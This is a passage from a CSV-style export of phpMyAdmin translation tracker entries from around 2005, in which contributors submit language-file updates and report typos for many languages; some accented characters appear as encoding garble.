"24444","3629","italian translation.
updates Original URL https sourceforge.net p phpmyadmin translations 598 https sourceforge.net p phpmyadmin translations 598 Original author pdanesi","bug"
"24444","3630","Japanese translation update.
Japanese translation update 2005 01 02) Original URL https sourceforge.net p phpmyadmin translations 599 https sourceforge.net p phpmyadmin translations 599 Original author elf2000","bug"
"24444","3631","Dutch Lang update.
Hi, See attachted file for the newly update dutch lang file.
Ivo Teel Original URL https sourceforge.net p phpmyadmin translations 600 https sourceforge.net p phpmyadmin translations 600 Original author anonymous","bug"
"24444","3632","Indonesian language update.
Indonesian language update CVS 06 01 05) Original URL https sourceforge.net p phpmyadmin translations 601 https sourceforge.net p phpmyadmin translations 601 Original author tamsy","bug"
"24444","3633","Galician Translation Update.
This file includes 4 new strings, a revision of 22 old ones and my new e mail address old by a couple of years, but I hadn t realized the old one was still there ).
Original URL https sourceforge.net p phpmyadmin translations 602 https sourceforge.net p phpmyadmin translations 602 Original author xosecalvo","bug"
"24444","3634","Spanish update 2.6.1.
As requested.
All the very best, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 603 https sourceforge.net p phpmyadmin translations 603 Original author anonymous","bug"
"24444","3635","Documentation ja.html Update 2.6.1 rc2).
Updated Documentation ja.html 2.6.1 rc2 shift jis) Original URL https sourceforge.net p phpmyadmin translations 604 https sourceforge.net p phpmyadmin translations 604 Original author tcool","bug"
"24444","3636","Typo in Czech translation.
There s a typo in the Czech translation Binarnxc3xad pole instead of Binxc3xa1rnxc3xad pole.
I am sending a patch for it.
Original URL https sourceforge.net p phpmyadmin translations 605 https sourceforge.net p phpmyadmin translations 605 Original author jakubvrana","bug"
"24444","3637","Galician Last 2 strings for 2.6.1 rc2.
Last two strings plus a number of updated ones.
Original URL https sourceforge.net p phpmyadmin translations 606 https sourceforge.net p phpmyadmin translations 606 Original author xosecalvo","bug"
"24444","3638","Serbian update again for 2.6.1.
Serbian last minute messages to translate for the final 2.6.1 Original URL https sourceforge.net p phpmyadmin translations 607 https sourceforge.net p phpmyadmin translations 607 Original author mikis","bug"
"24444","3639","for 2.6.2) Indonesian Translation Update v 2.65.
Indonesian Translation Update v 2.61 CVS 2005 01 12 00 31 53) Original URL https sourceforge.net p phpmyadmin translations 608 https sourceforge.net p phpmyadmin translations 608 Original author tamsy","bug"
"24444","3640","for 2.6.2) italian updates.
latest updates Original URL https sourceforge.net p phpmyadmin translations 609 https sourceforge.net p phpmyadmin translations 609 Original author pdanesi","bug"
"24444","3641","Typos in Czech translation.
Hello!
I think I found some typos in the Czech translation.
I am sending an unified diff correcting them.
Original URL https sourceforge.net p phpmyadmin translations 610 https sourceforge.net p phpmyadmin translations 610 Original author jakubvrana","bug"
"24444","3642","Estonian update.
new strings Original URL https sourceforge.net p phpmyadmin translations 611 https sourceforge.net p phpmyadmin translations 611 Original author finsoft","bug"
"24444","3643","Galician Translation Update.
Storage Engines and MyISAM Original URL https sourceforge.net p phpmyadmin translations 612 https sourceforge.net p phpmyadmin translations 612 Original author xosecalvo","bug"
"24444","3644","Estonian language update.
New strings and some corrections Original URL https sourceforge.net p phpmyadmin translations 613 https sourceforge.net p phpmyadmin translations 613 Original author finsoft","bug"
"24444","3645","Danish 2.6.2 update.
Still have problems w blank line after ?
gt; at EOF, mind.
Hope these translations are right, these last ones were tough. )
AlleyKat Original URL https sourceforge.net p phpmyadmin translations 614 https sourceforge.net p phpmyadmin translations 614 Original author dk alleykat","bug"
"24444","3646","Translation to Brazilian Portuguese.
I translated all variables in file brazilian portuguese iso 8859 1.inc.php I will send UTF 8 too Thanks Airon Luis Pereira Original URL https sourceforge.net p phpmyadmin translations 615 https sourceforge.net p phpmyadmin translations 615 Original author thedarkness","bug"
"24444","3647","Translation to Brazilian Portuguese UTF 8.
I translated all variables it is an UTF 8 file Thanks Airon Luis Pereira Original URL https sourceforge.net p phpmyadmin translations 616 https sourceforge.net p phpmyadmin translations 616 Original author thedarkness","bug"
"24444","3648","Swedish for 2.6.1.
Swedish translation of lastest strings for 2.6.1 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 617 https sourceforge.net p phpmyadmin translations 617 Original author bjornth","bug"
"24444","3649","Mistake in german translation.
In the german translation, there s the sentence Ohne besagte Erweiterung ist phpMyAdmin nicht in der Lage Zeichenketten zu trennen, was zu unerwarteten Ergebnissen fxc3xbchren kann.
strMbExtensionMissing) There s missing a comma after Lage , which is obligatory because of the invinitive construction.
Original URL https sourceforge.net p phpmyadmin translations 618 https sourceforge.net p phpmyadmin translations 618 Original author futurecrash","bug"
"24444","3650","de) Bad translation of strAddSearchConditions.
Hi rabus, please change translation of search conditions from Suchkondition to Suchkriterien ...
Regards ml Original URL https sourceforge.net p phpmyadmin translations 619 https sourceforge.net p phpmyadmin translations 619 Original author mathiasl26","bug"
"24444","3651","Japanese translation update.
i update translation files.
Original URL https sourceforge.net p phpmyadmin translations 620 https sourceforge.net p phpmyadmin translations 620 Original author elf2000","bug"
"24444","3652","Hungarian translating error.
there are a couple of error in lang hungarian utf 8.inc.php We have a char amp; 337; o) strDisableForeignChecks = Idegen kulcsok ellen or .... Csxc3xb6kken 0337 ;... Somewhere the translator use 0337 entity, somewhere o style strAccessDeniedExplanation = A phpMyAdmin ,egprxc3xb3bxc3xa1lt csatlakozni a MySQL szerverhez, de a szerver elutasxc3xadtotta a .... strAccessDeniedExplanation = A phpMyAdmin , m egprxc3xb3bxc3xa1lt .. missing m char Original URL https sourceforge.net p phpmyadmin translations 621 https sourceforge.net p phpmyadmin translations 621 Original author anonymous","bug"
"24444","3653","Catalan for 2.6.2.
Hi folks!
Here is attached the translation to catalan of the new mwssages for 2.6.2 Best regards!.
Xavier Navarro.
Girona Spain.
Original URL https sourceforge.net p phpmyadmin translations 622 https sourceforge.net p phpmyadmin translations 622 Original author xavin","bug"
"24444","3654","RU) incorrect translation for check overhead .
check mean mark , but not inspection this case ... see attached file This message is sequel of http sourceforge.net tracker index.php?
func=detail atid=387645 aid=1157688 group id=23067 Sorry, I can t find another way to attach file Original URL https sourceforge.net p phpmyadmin translations 623 https sourceforge.net p phpmyadmin translations 623 Original author gunsky","bug"
"24444","3655","Polish update.
Updated Polish translation for 2.6.2 Original URL https sourceforge.net p phpmyadmin translations 624 https sourceforge.net p phpmyadmin translations 624 Original author ubanus","bug"
"24444","3656","Polish Windows 1250 charset.
A user have requested support for the Polish translation with Windows 1250 charset.
The attached patch provides such a feature.
After applying it, please run in the lang directory touch polish iso 8859 2.inc.php; .
sync lang.sh Original URL https sourceforge.net p phpmyadmin translations 625 https sourceforge.net p phpmyadmin translations 625 Original author ubanus","bug"
"24444","3657","Spanish update for 262.
As requested.
All the very best, Dr. med.
Daniel Hinostroza dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 626 https sourceforge.net p phpmyadmin translations 626 Original author anonymous","bug"
"24444","3658","Japanese Documentation Update 2.6.1pl3).
Japanese Documentation Update.
File Documentation ja.html Encoding Shift JIS Version 2.6.1.pl3 Original URL https sourceforge.net p phpmyadmin translations 627 https sourceforge.net p phpmyadmin translations 627 Original author tcool","bug"
"24444","3659","Bad russian translation of strMaximumSize 2.6.1 pl3).
land russian windows 1251.inc.php, line 364 strMaximumSize = russian translation) ; This value translated as Minimum filesize =).
Have a nice day!
Original URL https sourceforge.net p phpmyadmin translations 628 https sourceforge.net p phpmyadmin translations 628 Original author lobovich","bug"
"24444","3660","Galician Translation Update.
Galician Translation Update Original URL https sourceforge.net p phpmyadmin translations 629 https sourceforge.net p phpmyadmin translations 629 Original author xosecalvo","bug"
"24444","3661","Traditional Chinese Update.
thx.
Original URL https sourceforge.net p phpmyadmin translations 630 https sourceforge.net p phpmyadmin translations 630 Original author siusun","bug"
"24444","3662","Serbian translation update for 2.6.2.
Serbian translation update for 2.6.2 both Serbian Cyrillic and Latin version) Original URL https sourceforge.net p phpmyadmin translations 631 https sourceforge.net p phpmyadmin translations 631 Original author mikis","bug"
"24444","3663","Chinese include file update.
mysf etang.com Original URL https sourceforge.net p phpmyadmin translations 632 https sourceforge.net p phpmyadmin translations 632 Original author anonymous","bug"
"24444","3664","Lastest message corrections catalan).
Hi folks!
Here are the last message corrections for catalan strCheckOverhead = Comprovar taules defragmentades ; strTransformation text plain substr = Mostra una part d\ una cadena de text.
La primera opcixc3xb3 xc3xa9s el nombre de caracters a saltar des de l\ inici de la cadena Per defecte 0).
La segona opcixc3xb3 xc3xa9s el nombre de caracters a retornar Per defecte fins al final de la cadena).
La tercera opcixc3xb3 xc3xa9s la cadena a afegir a l inici o al final quan hi ha truncament Per defecte ... ).
; Best regards.
Xavier Navarro.
Girona Spain Original URL https sourceforge.net p phpmyadmin translations 633 https sourceforge.net p phpmyadmin translations 633 Original author xavin","bug"
"24444","3665","Bulgarian translation update.
Id bulgarian utf 8.inc.php,v 2.69 2005 03 30 19 20 12 lem9 Exp Original URL https sourceforge.net p phpmyadmin translations 634 https sourceforge.net p phpmyadmin translations 634 Original author stanprog","bug"
"24444","3666","Latest message corrections for Serbian.
Two more changed strings for 2.6.2 Original URL https sourceforge.net p phpmyadmin translations 635 https sourceforge.net p phpmyadmin translations 635 Original author mikis","bug"
"24444","3667","2.6.2 Danish latest updates.
Just latest updates Original URL https sourceforge.net p phpmyadmin translations 636 https sourceforge.net p phpmyadmin translations 636 Original author dk alleykat","bug"
"24444","3668","Complete file update for Spanish 262.
I checked the entire spanish iso 8859 1.inc.php file downloaded from version 262 b1 and have made some corrections.
All the very best, Daniel dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 637 https sourceforge.net p phpmyadmin translations 637 Original author hinostroza","bug"
"24444","3669","Galician Translation Update.
A few strings about stored routines Original URL https sourceforge.net p phpmyadmin translations 638 https sourceforge.net p phpmyadmin translations 638 Original author xosecalvo","bug"
"24444","3670","Belarusian translation for 2.6.2.
Translation of 2.6.2 into Belarusian Original URL https sourceforge.net p phpmyadmin translations 639 https sourceforge.net p phpmyadmin translations 639 Original author zedlik","bug"
"24444","3671","split off strFields in 2.
A suggestion for a slight improvement of a Fields field lol)...
It d be much clearer if the Fields strFields) field on the Create new table on database X read Number of fields .
So a suggestion for a strFieldsNumber = Number of fields ; for use that one place.
Just at convenient time. )
Original URL https sourceforge.net p phpmyadmin translations 640 https sourceforge.net p phpmyadmin translations 640 Original author dk alleykat","bug"
"24444","3672","Finnish Translation for version 2.6.2!.
finnish iso 8859 1.inc.php v 2.62) Finnish language file by Visa Kopu, visa visakopu.net Jouni Kxc3xa4hkxc3xb6nen, kajouni mbnet.fi 14st April, 2005 by Jouni Kxc3xa4hkxc3xb6nen Rest of the file translated by Jouni Kahkonen as from timespanfmt) Table was previously translated taulu thought it should be taulukko , because this symbolizes better the meaning the taulu has more than one meaning) Some translation decisions are fixed a bit.
Original URL https sourceforge.net p phpmyadmin translations 641 https sourceforge.net p phpmyadmin translations 641 Original author yoneh","bug"
"24444","3673","grammatical error in translation to Brazilian Portuguese.
Just a detail.... After creating a new database, phpmyadmin displays a menu which has Edit and Create PHP Code ...
In Brazilian portuguese it should be Editar , but it s like Editaar ...
Original URL https sourceforge.net p phpmyadmin translations 642 https sourceforge.net p phpmyadmin translations 642 Original author dbersot","bug"
"24444","3674","Finnish translation fixes.
Here are a few variables that should be updated into the Finnish language file.
I would be very thankful if someone would update them.
strInnoDBBufferPoolSizeDesc = Muistipuskurin koko, jota InnoDB kxd7x94yttxd7x94xd7x94 taulukoissaan olevan datan ja indeksien viemiseen vxd7x94limuistiin.
; strInnoDBPages = sivua ; strHTMLExcelOptions = Microsoft Excel 2000 viennin valinnat ; strHTMLWordOptions = Microsoft Word 2000 viennin valinnat ; PS.
At first, the Finnish language file in .zip format) I posted somewhere here must be copied to cvs, and only after that, the string variables above must be updated to the file in the cvs dir.
Original URL https sourceforge.net p phpmyadmin translations 643 https sourceforge.net p phpmyadmin translations 643 Original author yoneh","bug"
"24444","3675","Mongolian translation for 2.6.2.
Unsorted Original URL https sourceforge.net p phpmyadmin translations 644 https sourceforge.net p phpmyadmin translations 644 Original author bayaraa","bug"
"24444","3676","Traditional Chinese Update for 2.6.3. updated Original URL https sourceforge.net p phpmyadmin translations 645 https sourceforge.net p phpmyadmin translations 645 Original author siusun","bug"
"24444","3677","Finnish update.
I cannot translate the string in strCheckOverhead, because I don t understand the meaning of it.
What means that Check tables having overhead ?
Does it mean something like Check tables that have gotten defragmented or Check tables above or Check tables being outside or Check tables that are unsused ???????
And does that Check mean Verify or Check with a checkbox ?
There are significant translation alternatives in Finnish for check as well as for overhead .
Could someone help me on this?
Original URL https sourceforge.net p phpmyadmin translations 646 https sourceforge.net p phpmyadmin translations 646 Original author yoneh","bug"
"24444","3678","Romanian translation typo.
Hi.
In the file romanian iso 8859 1.inc.php there is a typo on line 531.
The line currently reads strSQLQuery = Comansa SQL ; but should be strSQLQuery = Comanda SQL ; I ve seen this in all versions of phpMyAdmin.
Thanks.
Alex Original URL https sourceforge.net p phpmyadmin translations 647 https sourceforge.net p phpmyadmin translations 647 Original author tlex","bug"
"24444","3679","Swedish for 2.6.2.
Swedish translation of new messages for 2.6.2 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 648 https sourceforge.net p phpmyadmin translations 648 Original author bjornth","bug"
"24444","3680","Spanish Language Update 18 May 2005.
Again, here is my version of the spanish translation.
It is based on phpMyAdmin 2.62pl1 spanish language by Daniel Hinostroza.
This one is dated 18 May 2005 please disregard yesterday s post).
After many hours of extensive testing all pages seen and verified), i still found some mistakes, a few of them being important.
I really hope there are no more mistakes left.
I believe this features over 100 changes to overall translation.
So far i ve received very possitive feedback from the people managing my databases, so i hope you also like this.
I felt like giving something back to the community D Mastermnd Original URL https sourceforge.net p phpmyadmin translations 649 https sourceforge.net p phpmyadmin translations 649 Original author mastermnd","bug"
"24444","3681","Net translation Tatarish Tatarxc3xa7a 25.
May 2005.
As source for the translation was taked english utf 8.inc.php file v 2.59 2004 12 29 14 30 21 nijel) Next lines should be placed into .. libraries select lang.lib.php available languages = array ... tt iso 8859 9 = gt; array tt|tatarish , tatarish iso 8859 9 , tt ), tt utf 8 = gt; array tt|tatarish , tatarish utf 8 , tt ), ... Translator s name Albert Fazlxc3xad Public email amichauer g m x .
d e Original URL https sourceforge.net p phpmyadmin translations 650 https sourceforge.net p phpmyadmin translations 650 Original author anonymous","bug"
"24444","3682","Updated Norwegian language file.
Updated Norwegian translation based on norwegian iso 8859 1.inc v.2.79.
Original URL https sourceforge.net p phpmyadmin translations 651 https sourceforge.net p phpmyadmin translations 651 Original author sven erik","bug"
"24444","3683","Finnish lang updated.
Here is new Finnish lang file zipped.
Modifications I made strCreateDatabaseBeforeCopying = LUO TIETOKANTA ennen kopioimista ; strNumberOfFields = Kenttien lukumxd7x94xd7x94rxd7x94 ; Original URL https sourceforge.net p phpmyadmin translations 652 https sourceforge.net p phpmyadmin translations 652 Original author yoneh","bug"
"24444","3684","Updated Norwegian language file.
Updated Norwegian language file with the two new strings, strCreateDatabaseBeforeCopying and strNumberOfFields.
Original URL https sourceforge.net p phpmyadmin translations 653 https sourceforge.net p phpmyadmin translations 653 Original author sven erik","bug"
"24444","3685","Updated Belarusian language file.
Updated Belarusian language file.
New lines translated.
Original URL https sourceforge.net p phpmyadmin translations 654 https sourceforge.net p phpmyadmin translations 654 Original author zedlik","bug"
"24444","3686","Galician Translation Update.
New string and date in local Original URL https sourceforge.net p phpmyadmin translations 655 https sourceforge.net p phpmyadmin translations 655 Original author xosecalvo","bug"
"24444","3687","Traditional Chinese Update.
updated Original URL https sourceforge.net p phpmyadmin translations 656 https sourceforge.net p phpmyadmin translations 656 Original author siusun","bug"
"24444","3688","Italian update.
updates Original URL https sourceforge.net p phpmyadmin translations 657 https sourceforge.net p phpmyadmin translations 657 Original author pdanesi","bug"
"24444","3689","Finnish update now!.
Update this to cvs.
GeneratePassword, etc added.
Original URL https sourceforge.net p phpmyadmin translations 658 https sourceforge.net p phpmyadmin translations 658 Original author yoneh","bug"
"24444","3690","Updated Norwegian language file.
Updated Norwegian language file with the 3 new strings for v2.6.3 strGeneratePassword strGenerate strCopy Original URL https sourceforge.net p phpmyadmin translations 659 https sourceforge.net p phpmyadmin translations 659 Original author sven erik","bug"
"24444","3691","Mongolian translation.
translated lastest messages are strGeneratePassword = Generate Password ; strGenerate = Generate ; strCopy = Copy ; Original URL https sourceforge.net p phpmyadmin translations 660 https sourceforge.net p phpmyadmin translations 660 Original author bayaraa","bug"
"24444","3692","Update for the Hungarian translation.
I have created an update for the hungarian language files corrected o and u to amp; 337; amp; 337;) and amp; 369; amp; 369;) and lots of clerical errors in HTML tags these inverted commas are tag opening and closing characters and they cause false text output.)
for example lt;dfn title= Svxc3xa9d, bet unagysxc3xa1gra nem xc3xa9rzxc3xa9keny gt; translated some messages Original URL https sourceforge.net p phpmyadmin translations 661 https sourceforge.net p phpmyadmin translations 661 Original author necronix","bug"
"24444","3693","danish updated to 2.6.3.
Danish update.
strTransformation text plain unformatted lt; lt; this line is present ind the danish translation, but seems to have been removed from the english files?
Delete it if it should be deleted. )
And just give the word if you prefer the file unpacked, bz ed, tar ed, gz ed or whatever.
Thx, and keep up the good work.
Grtz, AlleyKat Original URL https sourceforge.net p phpmyadmin translations 662 https sourceforge.net p phpmyadmin translations 662 Original author dk alleykat","bug"
"24444","3694","Swedish for 2.6.3.
Swedish translation for 2.6.3 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 663 https sourceforge.net p phpmyadmin translations 663 Original author bjornth","bug"
"24444","3695","Japanese translation Updated for 2.6.3 cvs).
Japanese translation Updated for 2.6.3 cvs) Original URL https sourceforge.net p phpmyadmin translations 664 https sourceforge.net p phpmyadmin translations 664 Original author elf2000","bug"
"24444","3696","Traditional Chinese Update.
one string translated Original URL https sourceforge.net p phpmyadmin translations 665 https sourceforge.net p phpmyadmin translations 665 Original author siusun","bug"
"24444","3697","Catalan revision for 2.6.3.
Hi folks!
Here are a complete revision of catalan translation for 2.6.3 Best regards.
Xavier Navarro.
Girona Spain.
Original URL https sourceforge.net p phpmyadmin translations 666 https sourceforge.net p phpmyadmin translations 666 Original author xavin","bug"
"24444","3698","Lithuanian translation.
I have not translated some messages, as i havent had practice with some of MySQL features, so i didnt want to mess with the exact meaning of the message.
Vilius Simonaitis Original URL https sourceforge.net p phpmyadmin translations 667 https sourceforge.net p phpmyadmin translations 667 Original author maumas98","bug"
"24444","3699","danish update for 2.6.3 rc1.
With the latest line added, line sorting attempted to match the english file what a strange order).
Id comment line changed to var Id for CVS.
Original URL https sourceforge.net p phpmyadmin translations 668 https sourceforge.net p phpmyadmin translations 668 Original author dk alleykat","bug"
"24444","3700","Swedish for 2.6.3.
Updated Swedish language file.
I went through the whole Swedish file and compared with the English file.
I noticed that several messages had changed in the English file since they where introduced.
The Swedish translation is now totally up to date.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 669 https sourceforge.net p phpmyadmin translations 669 Original author bjornth","bug"
"24444","3701","Official Spanish translation for 2.6.3.
Hi all, Well, it took me some time to check Mastermnd s suggestions.
Almost all of them have been accepted.
This latest Spanish translation supercedes all previous versions.
Please give Mastermnd credit for his excellent work on the Spanish translation of 2.6.2.
All the very best, Dr. med.
Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 670 https sourceforge.net p phpmyadmin translations 670 Original author hinostroza","bug"
"24444","3702","Updated Indonesian Translation.
Updated Indonesian translation v 2.80 2005 07 10 20 35 36 nijel Original URL https sourceforge.net p phpmyadmin translations 671 https sourceforge.net p phpmyadmin translations 671 Original author tamsy","bug"
"24444","3703","Galician Translation Update.
A few new strings.
Original URL https sourceforge.net p phpmyadmin translations 672 https sourceforge.net p phpmyadmin translations 672 Original author xosecalvo","bug"
"24444","3704","Italian Translaslation Update.
Italian Translaslation Update; Zip file with 3 italian translation with differents encodings Original URL https sourceforge.net p phpmyadmin translations 673 https sourceforge.net p phpmyadmin translations 673 Original author rebeluca","bug"
"24444","3705","Brazilian Portuguese Update.
Update to version 2.6.3 pl1 100 translated Original URL https sourceforge.net p phpmyadmin translations 674 https sourceforge.net p phpmyadmin translations 674 Original author thedarkness","bug"
"24444","3706","Lang Azerbaijanian ISO and UTF).
Its Shahriyar Imanov aka Shehi again, with most recent Azerbaijani language files.
I am attaching updated version of language files archive contains both ISO and UTF versions with our language specific letter support.
I will send more updates very soon ) Thanks for your wonderful job and such a great tool!
Original URL https sourceforge.net p phpmyadmin translations 675 https sourceforge.net p phpmyadmin translations 675 Original author shehriyari","bug"
"24444","3707","Bulgarian translation update.
Bulgarian translation update.
The translation is based on the latest file version from the CVS.
Original URL https sourceforge.net p phpmyadmin translations 678 https sourceforge.net p phpmyadmin translations 678 Original author stanprog","bug"
"24444","3708","Updated Norwegian language file.
Updated Norwegian language file based on CVS v2.87.
Original URL https sourceforge.net p phpmyadmin translations 676 https sourceforge.net p phpmyadmin translations 676 Original author sven erik","bug"
"24444","3709","Estonian language file update.
updates Original URL https sourceforge.net p phpmyadmin translations 679 https sourceforge.net p phpmyadmin translations 679 Original author finsoft","bug"
"24444","3710","danish update 2.6.3 pl1 cvs.
update to latest cvs Original URL https sourceforge.net p phpmyadmin translations 677 https sourceforge.net p phpmyadmin translations 677 Original author dk alleykat","bug"
"24444","3711","Bengali Translation future work).
My team Ekushey http www.ekushey.org ) and Ankur http www.ankurbangla.org ) is working with lots of Bangla l10n projects.
Now we want to translate phpMyAdmin in Bengali.
Can anyone help us regarding this?
I mean can anyone show us the way to translate this in Bengali?
Regards Omi Azad Contributor Bangla Computing and Localization Projects Ankur http www.ankurbangla.org Ekushey http www.ekushey.org Original URL https sourceforge.net p phpmyadmin translations 680 https sourceforge.net p phpmyadmin translations 680 Original author omiazad","enhancement"
"24444","3712","estonian language update.
changed some words Original URL https sourceforge.net p phpmyadmin translations 682 https sourceforge.net p phpmyadmin translations 682 Original author uhuu","bug"
"24444","3713","Slovak Translation Update for 2.6.4).
as the current status of slovak translation of phpmyadmin is 87.3 , i did an update to make it 100 .
all three charsets included .zip archive) Original URL https sourceforge.net p phpmyadmin translations 681 https sourceforge.net p phpmyadmin translations 681 Original author shylauda69","bug"
"24444","3714","macedonian translation work in progress).
Macedonian UTF 8 translation file.
Original URL https sourceforge.net p phpmyadmin translations 683 https sourceforge.net p phpmyadmin translations 683 Original author skalper","bug"
"24444","3715","Swedish for 2.6.4.
Swedish translation file for 2.6.4 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 684 https sourceforge.net p phpmyadmin translations 684 Original author bjornth","bug"
"24444","3716","Catalan for 2.6.4.
Hi Folks, Here is a zipped archive with the messages for 2.6.4 Original URL https sourceforge.net p phpmyadmin translations 685 https sourceforge.net p phpmyadmin translations 685 Original author xavin","bug"
"24444","3717","Spanish iso 8859 1 translations and one change for 2.6.4.
Hi Marc, The zip contains the new translations and one change for what s already online.
All the very best, Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 686 https sourceforge.net p phpmyadmin translations 686 Original author hinostroza","bug"
"24444","3718","Updated Norwegian language file.
Updated Norwegian languagefile with the new strings for v2.6.4.
Original URL https sourceforge.net p phpmyadmin translations 687 https sourceforge.net p phpmyadmin translations 687 Original author sven erik","bug"
"24444","3719","Traditional Chinese Update.
updated.
however.. would you mind give more detail about strAndThen or give a full sentence of the message.
I don t know where the string will use and cause difficult to translate.
thanks.
Original URL https sourceforge.net p phpmyadmin translations 688 https sourceforge.net p phpmyadmin translations 688 Original author siusun","bug"
"24444","3720","Japanese Translation.
Update japanese translation.
Original URL https sourceforge.net p phpmyadmin translations 689 https sourceforge.net p phpmyadmin translations 689 Original author elf2000","bug"
"24444","3721","Indonesian Language Update.
Indonesian Language Update Revision 2.83, Thu Aug 18 09 36 25 2005 UTC.
Original URL https sourceforge.net p phpmyadmin translations 690 https sourceforge.net p phpmyadmin translations 690 Original author tamsy","bug"
"24444","3722","Afrikaans work in progress).
If no one else is doing this, I guess I am handling the translation to Afrikaans now.
Original URL https sourceforge.net p phpmyadmin translations 691 https sourceforge.net p phpmyadmin translations 691 Original author volume4","bug"
"24444","3723","Polish update.
Polish update Original URL https sourceforge.net p phpmyadmin translations 692 https sourceforge.net p phpmyadmin translations 692 Original author ubanus","bug"
"24444","3724","Belarusian update.
Belarusian cyrillic and latin update Original URL https sourceforge.net p phpmyadmin translations 693 https sourceforge.net p phpmyadmin translations 693 Original author zedlik","bug"
"24444","3725","turkish final update.
here is the final update of turkish translation... sorry for the delay.
Original URL https sourceforge.net p phpmyadmin translations 694 https sourceforge.net p phpmyadmin translations 694 Original author boralioglu","bug"
"24444","3726","Serbian update for 2.6.4.
Updated Serbian cyrillic and latin) translation for phpMyAdmin 2.6.4 Original URL https sourceforge.net p phpmyadmin translations 695 https sourceforge.net p phpmyadmin translations 695 Original author mikis","bug"
"24444","3727","Mongolian 2.6.4.
2005 09 09 Original URL https sourceforge.net p phpmyadmin translations 696 https sourceforge.net p phpmyadmin translations 696 Original author bayaraa","bug"
"24444","3728","Hebrew UTF 8 Files.
New Version for Hebrew UTF 8.
Still a few missing strings Ixe7x9fxa5 trying to understand, but most of it is translated Original URL https sourceforge.net p phpmyadmin translations 697 https sourceforge.net p phpmyadmin translations 697 Original author hpman28","bug"
"24444","3729","Hebrew iso File.
New iso 8859 8 i file.
Still a few missing strings Ixe7x9fxa5 trying to understand, but most of it is translated Original URL https sourceforge.net p phpmyadmin translations 698 https sourceforge.net p phpmyadmin translations 698 Original author hpman28","bug"
"24444","3730","Bulgarian Translation Update.
Id bulgarian utf 8.inc.php,v 2.87 2005 09 27 16 41 17 nijel Exp Cheers ) Stanislav Yordanov Original URL https sourceforge.net p phpmyadmin translations 699 https sourceforge.net p phpmyadmin translations 699 Original author stanprog","bug"
"24444","3731","Documentation ja.html for 2.6.4 pl2.
Japanese Documentation.html for 2.6.4 pl2 Shift JIS encoded Original URL https sourceforge.net p phpmyadmin translations 700 https sourceforge.net p phpmyadmin translations 700 Original author tcool","bug"
"24444","3732","For 2.7.0 English original messages.
Hi, The attached file contains the messages to be translated.
Please post your complete file not just the new messages) on a separate tracker entry, and remember to remove the to translate ending of the messages you translated.
Thanks!
Original URL https sourceforge.net p phpmyadmin translations 701 https sourceforge.net p phpmyadmin translations 701 Original author lem9","bug"
"24444","3733","Japanese Translation CVS 2005 10 26 14 45 JST).
Translation updated.
Original URL https sourceforge.net p phpmyadmin translations 702 https sourceforge.net p phpmyadmin translations 702 Original author elf2000","bug"
"24444","3734","slovak translation for 2.7.0. slovak iso 8859 2.inc.php zipped into a slovak 270.zip archive Original URL https sourceforge.net p phpmyadmin translations 703 https sourceforge.net p phpmyadmin translations 703 Original author shylauda69","bug"
"24444","3735","slovak translation for 2.7.0 fix.
just noticed the missing translation of the strConfigFileError variable.
fixed, attached slovak iso 8859 2.inc.php in the .zip archive Original URL https sourceforge.net p phpmyadmin translations 704 https sourceforge.net p phpmyadmin translations 704 Original author shylauda69","bug"
"24444","3736","Japanese Translation.
Update japanese translation.
Original URL https sourceforge.net p phpmyadmin translations 705 https sourceforge.net p phpmyadmin translations 705 Original author elf2000","bug"
"24444","3737","Updated Norwegian translation for 2.7.0.
Updated Norwegian language file based on CVS revision 2.107 with new strings for v2.7.0.
Original URL https sourceforge.net p phpmyadmin translations 706 https sourceforge.net p phpmyadmin translations 706 Original author sven erik","bug"
"24444","3738","Bulgarian Translation Update.
Id bulgarian utf 8.inc.php,v 2.100 2005 10 30 10 03 49 nijel Exp Original URL https sourceforge.net p phpmyadmin translations 707 https sourceforge.net p phpmyadmin translations 707 Original author stanprog","bug"
"24444","3739","Finnish translation for 2.7.0.
Here is finnish translation for 2.7.0.
There are also some other improvements, grammatical fixes done.
Original URL https sourceforge.net p phpmyadmin translations 708 https sourceforge.net p phpmyadmin translations 708 Original author yoneh","bug"
"24444","3740","Belarusian translation for 2.7.0.
Balarusian translation for 2.7.0.
Cyrillic and Latin scripts.
Original URL https sourceforge.net p phpmyadmin translations 709 https sourceforge.net p phpmyadmin translations 709 Original author zedlik","bug"
"24444","3741","Swedish for 2.7.0.
Swedish translation for 2.7.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 710 https sourceforge.net p phpmyadmin translations 710 Original author bjornth","bug"
"24444","3742","Updated Swedish for 2.7.0.
Updated Swedish translation for 2.7.0.
Fixed syntax error and updated some strings.
The two strings strShowStatusInnodb dblwr pages writtenDescr and strShowStatusInnodb dblwr writesDescr are the same, and they don t seem to be used anywhere.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 711 https sourceforge.net p phpmyadmin translations 711 Original author bjornth","bug"
"24444","3743","Japanese translation updated.. Japanese translation updated,it is for CVS now.
Original URL https sourceforge.net p phpmyadmin translations 712 https sourceforge.net p phpmyadmin translations 712 Original author elf2000","bug"
"24444","3744","Japanese translation updated.
Japanese translation updated.
ja lang in cvs has broken.
I fixed problem, and a translated new message.
Original URL https sourceforge.net p phpmyadmin translations 713 https sourceforge.net p phpmyadmin translations 713 Original author elf2000","bug"
"24444","3745","Italian Translation Update.
New italian translation update.
This update corrects mistakes and typing errors from the previous translation and add new translated strings.
Translation from CVS version phpMyAdmin 20051128 053502.
Original URL https sourceforge.net p phpmyadmin translations 714 https sourceforge.net p phpmyadmin translations 714 Original author rebeluca","bug"
"24444","3746","Catalan for 2.7.0.
Hi, guys, There is a zipped file with the catalan translation for 2.7.0 Best regards.
Xavier Navarro.
Original URL https sourceforge.net p phpmyadmin translations 715 https sourceforge.net p phpmyadmin translations 715 Original author xavin","bug"
"24444","3747","Galician language update.
